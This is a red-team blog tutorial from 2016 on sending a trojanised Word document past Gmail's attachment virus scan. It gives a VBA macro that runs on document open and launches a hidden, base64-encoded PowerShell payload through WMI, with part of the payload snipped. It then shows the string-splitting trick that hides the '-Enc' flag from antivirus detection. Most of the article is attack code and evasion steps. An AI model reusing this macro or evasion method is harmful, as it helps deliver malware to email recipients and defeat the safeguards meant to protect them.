Vincent Yiu
Vincent Yiu
linkedin
github
@vysecurity
Red Team
About Vincent Yiu
Red Team Tips
Videos
Red Team
Attack Infrastructure
Backdooring PE Files
Cloud Security
Command and Control
General Exploitation
Payload Generation with CACTUSTORCH
Exploiting CVE-2017–8759: SOAP WSDL Parser Code Injection
Exploiting CVE-2017–0199: HTA Handler Vulnerability
F# Shellcode Execution
Bypassing Gmail Attachment Virus Check
IPFuscation
Hardware and Gadgets
Post Exploitation
Reconaissance
Misc
Powered by GitBook

Bypassing Gmail Attachment Virus Check

Bypass Gmail's Attachment Virus Check for PowerShell Macros

Note: This was posted in January 2016

So today whilst doing some practice on creating trojanised Microsoft Word documents, I came across an issue. Gmail by default has a virus check on attachments if you want to send a malicious attachment out.

To insert a payload into the word document, I firstly created a template which looked like the below.

After doing so, creating the macro using AutoOpen and Document_Open was trivial. I made use of a powershell one liner payload along with process creation to launch powershell using an encrypted Payload. Using Powershell Empire’s default copy and paste macro stager, this is detected.

Sample payload:

*Sub AutoOpen()
Debugging
End Sub*
*Sub Document_Open()
Debugging
End Sub*
*Public Function Debugging() As Variant
Dim Str As String
str = “powershell.exe -NoP -NonI -W Hidden -Enc JAB3AGMAP”
str = str + “QBOAGUAVwAtAE8AYgBKAGUAQwB0ACAAUwB5AFMAVABlAE0ALgB”*
*<snip to save space and sensitivity>*
*str = str + “ATwBJAG4AJwAnACkA”
Const HIDDEN_WINDOW = 0
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2″)
Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2:Win32_Process”)
objProcess.Create str, Null, objConfig, intProcessID
End Function*

What I did was begin removing lines of code and kept uploading repeatedly to Gmail attachments until it would no longer detect it as a virus.

I made adjustments to the payload trying to identify which string or pattern the AV was picking up. I quickly realised that it was the fact that the “-Enc” was part of the payload.

To resolve this, I split the “-Enc” string into “-E” and “nc” then concatenated it together. For example:

*Dim Yops As String*
*Yops = “powershell.exe -Enc PAYLOADHERE”*

This would be translated to the following:

*Dim Yops As String*
*Yops = “powershell.exe -E”*
*Yops = Yops + “nc PAYLOADHERE”*

However, this technique did not work. My next approach to thinking about it was that the “Yops” string is checked at the end after all the concatenation to determine whether “-Enc” is followed by “powershell.exe”. Therefore what I did was the following and it bypassed the virus checks.

*Dim Yops As String*
*Yops = “powershell.exe -E”*
*Yolo = “nc PAYLOAD”*
*Yops = Yops + Yolo + “HERE”*

This quickly bypassed the antivirus feature on Gmail’s attachments and I was able to send the payload to my other machine for testing.

Previous
F# Shellcode Execution
Next
IPFuscation
Last updated 3 years ago